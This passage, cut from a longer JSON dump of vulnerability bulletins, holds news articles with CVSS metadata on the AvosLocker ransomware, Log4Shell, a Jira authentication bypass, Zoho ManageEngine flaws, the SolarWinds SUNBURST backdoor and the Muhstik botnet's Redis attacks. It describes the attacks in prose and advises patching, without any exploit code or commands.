Federal Bureau of Investigation (FBI) in March 2022.\n\nTelemetry data gathered by Trend Micro [shows](<https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker>) that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.\n\nThe entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software ([CVE-2021-40539](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>)) to run an HTML application ([HTA](<https://en.wikipedia.org/wiki/HTML_Application>)) hosted on a remote server.\n\n\"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,\" the researchers explained.\n\nThis includes retrieving an ASPX web shell from the server as well as an installer for the [AnyDesk](<https://thehackernews.com/2021/05/malvertising-campaign-on-google.html>) remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.\n\nSome of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw ([CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints. 
\n\nThe batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.\n\nAlso used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company [resolved in June 2021](<https://forum.avast.com/index.php?topic=283231.0>).\n\n\"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),\" the researchers pointed out. \"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-03T05:50:00", "type": "thn", "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-03T05:50:32", "id": "THN:E7E8D45492BAD83E88C89D34F8502485", "href": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. 
Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. 
However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. 
\"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:26", "description": "Atlassian has published a security advisory warning of a 
critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections.\n\nTracked as [**CVE-2022-0540**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0540>), the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness.\n\n\"A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration,\" Atlassian [noted](<https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html>).\n\nThe flaw affects the following Jira products -\n\n * Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x\n * Jira Service Management Server and Jira Service Management Data Center: All versions before 4.13.18, 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, and 4.21.x\n\nFixed Jira and Jira Service Management versions are 8.13.18, 8.20.6, and 8.22.0 and 4.13.18, 4.20.6, and 4.22.0.\n\nAtlassian also noted that the flaw affects first and third-party apps only if they are installed in one of the aforementioned Jira or Jira Service Management versions and that they are using a vulnerable configuration.\n\nUsers are strongly recommended to update to one of the patched versions to mitigate potential exploitation attempts. 
If immediate patching isn't an option, the company is advising updating the affected apps to a fixed version or disabling them altogether.\n\nIt's worth noting that a critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild last year to [install](<https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html>) [cryptocurrency miners](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) on compromised servers.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T05:52:00", "type": "thn", "title": "Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", 
"CVE-2022-0540"], "modified": "2022-04-23T05:52:42", "id": "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "href": "https://thehackernews.com/2022/04/atlassian-drops-patches-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": "Enterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months.\n\nThe issue, assigned the identifier [CVE-2021-44515](<https://nvd.nist.gov/vuln/detail/CVE-2021-44515>), is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server.\n\n\"If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution,\" Zoho [cautioned](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) in an [advisory](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>). 
\"As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible.\"\n\nThe company has also made available an [Exploit Detection Tool](<https://downloads.zohocorp.com/dnd/Desktop_Central/XTsIm8tSrnzjXhW/detector.zip>) that will help customers identify signs of compromise in their installations.\n\nWith this development, CVE-2021-44515 joins two other vulnerabilities [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) and [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) that have been [weaponized](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) to compromise the networks of critical infrastructure organizations across the world.\n\nThe disclosure also comes a day after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) that CVE-2021-44077 \u2014 an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus \u2014 is being exploited to drop web shells and carry out an array of post-exploitation activities as part of a campaign dubbed \"TiltedTemple.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T05:07:00", "type": "thn", "title": "Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-04T05:09:04", "id": "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "href": "https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:42", "description": "Enterprise software maker Zoho on Monday issued patches for a critical 
security vulnerability in Desktop Central and Desktop Central MSP that a remote adversary could exploit to perform unauthorized actions in affected servers.\n\nTracked as [CVE-2021-44757](<https://nvd.nist.gov/vuln/detail/CVE-2021-44757>), the shortcoming concerns an instance of authentication bypass that \"may allow an attacker to read unauthorized data or write an arbitrary zip file on the server,\" the company [noted](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) in an advisory.\n\nOsword from SGLAB of Legendsec at Qi'anxin Group has been credited with discovering and reporting the vulnerability. The Indian firm said it remediated the issue in build version 10.1.2137.9.\n\nWith the latest fix, Zoho has addressed a total of four vulnerabilities over the past five months \u2014\n\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine ADSelfService Plus\n * [CVE-2021-44077](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) \u2013 Unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus, and\n * [CVE-2021-44515](<https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine Desktop Central\n\nGiven that all three aforementioned flaws have been exploited by malicious actors, it's recommended that users apply the updates as soon as possible to mitigate any potential threats.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T05:13:00", "type": "thn", "title": "Zoho Releases Patch for Critical Flaw Affecting ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T10:03:19", "id": "THN:A29E47C7A7467A109B420FF0819814EE", "href": "https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "State-sponsored actors allegedly working for Russia have 
[targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remain unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security 
products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. 
The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\nThis rogue version of the SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. \"
The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that were released between March and June 2020, while recommending that users upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nNumbering as many as [60](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be 
accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:25", "description": 
"Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to have been [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home routers, DD-WRT routers, and [Tomato 
routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n
